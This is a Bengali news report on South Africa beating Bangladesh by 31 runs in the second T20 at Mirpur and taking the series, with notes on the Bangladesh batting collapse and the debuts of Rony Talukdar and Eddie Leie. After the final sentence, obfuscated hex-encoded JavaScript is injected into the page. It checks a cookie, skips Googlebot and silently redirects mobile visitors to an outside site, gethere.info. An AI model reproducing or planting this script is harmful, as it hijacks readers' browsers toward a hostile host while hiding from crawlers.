হেসে-খেলে সিরিজ জয় দ.আফ্রিকার

1
খলিলুর রহমান : বাংলাদেশের শেষ ব্যাটসম্যান হিসেবে যখন আউট হলেন মুস্তাফিজুর রহমান, দক্ষিণ আফ্রিকান ফিল্ডাররা একে অন্যের সঙ্গে হাত মিলিয়েই শেষ করলেন উদযাপন। ম্যাচ এবং সিরিজ জয়ের উদযাপন এমন নিস্তরঙ্গ! অনেক আগেই নিশ্চিত হয়ে গেছে যে জয়, তার আনুষ্ঠানিকতা সারার মুহুর্তে বাধভাঙ্গা উদযাপনের কী আছে!
দক্ষিণ আফ্রকিার জয় তো নিশ্চিত হয়েছে ম্যাচ শেষের অনেক আগেই। তা বাংলাদেশ ম্যাচটা হারল কখন? প্রেটিয়াদের চাপিয়ে দেওয়া ১৬৯ রানের বোঝার পরও আশা ছিল। আশাটা জাগিয়ে তুলেছিল তামিম ইকবাল ও সৌম্য সরকারের উদ্বোধনী জুটি। বিশেষ করে সৌম্য সরকারের ব্যাটিং। লক্ষ্য ১৭০ রান। তামিম-সৌম্যর উদ্বোধনী জুটিতে ৫.৫ ওভারেই ৪৬। কিন্তু আশা জাগানো পথচলায় আচমকাই ছন্দপতন। পারনেলকে পুল করতে গিয়ে সহজ ক্যাচ তুলে দিলেন তামিম। পরের ওভারেই অভিষিক্ত এডি লিইয়ের বলে স্টাম্পিং সৌম্য। তবে তামিম নয়, বাংলাদেশের জন্য বড় ধাক্কাটা ছিল আসলে সৌম্যর বিদায়টাই। তামিমকে দর্শক বানিয়ে একের পর এক বাউন্ডারি মারছিলেন সৌম্য। আর একটু একটু করে গ্যালারিতে জাগিয়ে তুলছিলেন আশা। কিন্তু বরাবরের মতো আজও (মঙ্গলবার) ইনিংসটা লম্বা করতে পারলেন না। পারলেন না জেগে উঠা আশাকে বাস্তবের পথে এগিয়ে দিতে। লিইকে এগিয়ে এসে মারতে গিয়ে স্টাম্পিং সৌম্য। এরপর ২৭ রানের মধ্যে আরও ৪ উইকেটের পতন। মিরপুর শেরে বাংলা স্টেডিয়ামের গ্যালারিকে নিস্তব্ধ করে একে একে প্যাভিলিয়নে সাকিব-মুশফিক-সাব্বির-নাসির।
জয়ের আশা জাগা ম্যাচে বাংলাদেশ ১ উইকেটে ৫৫ থেকে মুহূর্তেই ৬ উইকেটে ৮২ রানের দল। বাংলাদেশের নামের পাশে হার লেখা হয়ে গেছে তখনই। এরপর লিটন দাস, অভিষিক্ত রনি তালুকদার ও অধিনায়ক মাশরাফির ব্যাটিং আশাহীন পথচলায় সাময়িক বিনোদন মাত্র। যাতে শুধু হারের ব্যবধানটাই ছোট হয়েছে।
প্রথম টি-টোয়েন্টিতে হার ৫২ রানে। আজ দ্বিতীয় ম্যাচে হার ৩১ রানে। পরাজয়ের ব্যবধান হয়তো উন্নতির কথাই বলবে। আসলেই কী? টি-টোয়েন্টিতে ১০ রানের হারকেই যেখানে ফেলা হয় বিশাল ব্যবধানের হারে, সেখানে ৩১ রানের হারের পর নিজেদের খেলায় উন্নতি খোজার চেষ্টা নিছকই বাতুলতা। সেই চেষ্টা না করে বাংলাদেশের টিম-ম্যানেজমেন্টের বরং উচিত আসন্ন ওয়ানডে সিরিজ নিয়ে ভাবা!
ব্যাঠিং ব্যর্থতায় আরও একটি বড় পরাজয়। অথচ নাসির-আরাফাত সানিদের কল্যাণে কী দুর্দান্তভাবেই না ঘুরে দাড়িয়েছিল বাংলাদেশ। প্রথম ম্যাচের মতোই টস জিতে প্রথমে ব্যাটিং নেন দক্ষিণ আফ্রিকান অধিনায়ক ফ্যাফ ডু প্লেসি। তবে প্রথম ম্যাচের মতো এবার শুরুতেই উইকেট খোয়ানে নয়। বরং বাংলাদেশের বোলারদের নাকে-মুখের জল এক করে ডি কক-ডি ভিলিয়ার্স উদ্বোধনী জুটিতে মাত্র ১০.৩ ওভারেই করে ফেলে ৯৫ রান। দক্ষিণ আফ্রিকার স্কোর ২০০ পেরোবে বলেই মনে হচ্ছিল তখন। সেই দক্ষিণ আফ্রিকা শেষ পর্যন্ত করতে পারে ৪ উইকেটে ১৬৯ রান। সেটাও সম্ভব হয়েছে শেষ দুই ওভারে ৩২ রান নেওয়ায়। অ্যান্টন ডি কককে আউট করে বাংলাদেশকে প্রথম ব্রেক থ্রু দেন আরাফাত সানি। পরের ওভারে পরপর দুই বলে বিপদজনক ডি ভিলিয়ার্স ও জেপি ডুমিনিকে ফেরান নাসির। দক্ষিণ আফ্রিকার রানের চাকাও থমকে যায় তাতে। কিন্তু শেষ পর্যন্ত তো সেই বড় হারই।
প্রথম ম্যাচে হারার পরই বাংলাদেশ দলের পক্ষ থেকে ইঙ্গিত দেওয়া হয়েছিল দলে পরিবর্তন আনার। সেই ইঙ্গিত মতোই সোহাগ গাজীর জায়গায় আজ অভিষেক হয় রনি তালুকদারের। কিন্তু ঘরোয়া ক্রিকেটে সর্বোচ্চ রান করা রনি তালুকদার ভালো কিছু করে দেখানোর সুযোগই পেলেন না। ঘরোয়া ক্রিকেটে ওপেনিং ব্যাটসম্যান হিসেবে খেলা নারায়নগঞ্জের ছেলেকে জীবনের প্রথম আন্তর্জাতিক ম্যাচে কিনা হলো ৭ নম্বরে! নমব ব্যাটসম্যান হিসেবে আউট হওয়ার আগে তাই করতে পারলেন মাত্র ২১ রান। তবে ফাঙ্গিসোকে উড়িয়ে মারা একমাত্র ছক্কাটি দিয়ে রনি বুঝিয়ে দিয়েছেন সুযোগ পেলে আর্ন্তাজাতিক ক্রিকেটেও রান করতে প্রস্তুত তিনি।
পরিবর্তন ছিল দক্ষিণ আফ্রিকা একাদশেও। প্রথম ম্যাচে ২ উইকেট নেওয়া পেসার রাবাদার জায়গায় অভিষেক হয় লেগ স্পিনার এডি লিইয়ের। বাংলাদেশের আসল সর্বনাশটাও করেছেন এই লেগ স্পিনারই। সৌম্য সরকারের পর মুশফিক এবং সাব্বিরকেও ফিরিয়েছেন তিনি। অভিষেকেই ৩ উইকেট, যা তাতে এনে দিয়েছে ম্যাচসেরার পুরস্কার। সিরিজ সেরাও সফরকারী দলের একজন, দক্ষিণ আফ্রিকার অধিনায়ক ফ্যাফ ডু প্লেসিস।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}